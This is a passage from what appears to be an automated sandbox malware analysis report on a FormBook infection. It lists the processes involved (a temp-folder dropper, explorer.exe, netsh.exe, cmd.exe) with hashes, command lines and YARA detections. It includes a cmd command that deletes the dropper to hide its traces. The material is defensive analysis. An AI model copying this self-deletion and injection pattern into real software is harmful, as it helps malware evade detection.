                        MD5 hash:6CC14805BBF5E6BFB4DAAE5C8A61AF7E
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low

                        General

                        Target ID:1
                        Start time:13:15:57
                        Start date:29/11/2022
                        Path:C:\Users\user\AppData\Local\Temp\jsqqecy.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Local\Temp\jsqqecy.exe" C:\Users\user\AppData\Local\Temp\xduyswx.up
                        Imagebase:0xbc0000
                        File size:147968 bytes
                        MD5 hash:07875284CE0A6276F406B25F9E429270
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.304792498.0000000001090000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.304792498.0000000001090000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.304792498.0000000001090000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.304792498.0000000001090000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        Antivirus matches:
                        • Detection: 100%, Joe Sandbox ML
                        • Detection: 20%, ReversingLabs
                        Reputation:low

                        General

                        Target ID:2
                        Start time:13:15:57
                        Start date:29/11/2022
                        Path:C:\Users\user\AppData\Local\Temp\jsqqecy.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Local\Temp\jsqqecy.exe" C:\Users\user\AppData\Local\Temp\xduyswx.up
                        Imagebase:0xbc0000
                        File size:147968 bytes
                        MD5 hash:07875284CE0A6276F406B25F9E429270
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.381040455.0000000001060000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.381040455.0000000001060000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.381040455.0000000001060000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.381040455.0000000001060000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.300703858.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000000.300703858.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.300703858.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.300703858.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.381071998.0000000001090000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.381071998.0000000001090000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.381071998.0000000001090000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.381071998.0000000001090000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:low

                        General

                        Target ID:3
                        Start time:13:16:01
                        Start date:29/11/2022
                        Path:C:\Windows\explorer.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\Explorer.EXE
                        Imagebase:0x7ff618f60000
                        File size:3933184 bytes
                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.352626169.000000000DF14000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000000.352626169.000000000DF14000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.352626169.000000000DF14000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.352626169.000000000DF14000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:high

                        General

                        Target ID:4
                        Start time:13:16:33
                        Start date:29/11/2022
                        Path:C:\Windows\SysWOW64\netsh.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\netsh.exe
                        Imagebase:0x7ff7c72c0000
                        File size:82944 bytes
                        MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.562405405.0000000002930000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.562405405.0000000002930000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.562405405.0000000002930000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.562405405.0000000002930000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.562589613.0000000002E20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.562589613.0000000002E20000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.562589613.0000000002E20000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.562589613.0000000002E20000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.562707442.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.562707442.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.562707442.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.562707442.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:high

                        General

                        Target ID:5
                        Start time:13:16:38
                        Start date:29/11/2022
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:/c del "C:\Users\user\AppData\Local\Temp\jsqqecy.exe"
                        Imagebase:0xd90000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Target ID:6
                        Start time:13:16:38
                        Start date:29/11/2022
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7c72c0000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Disassembly

                        No disassembly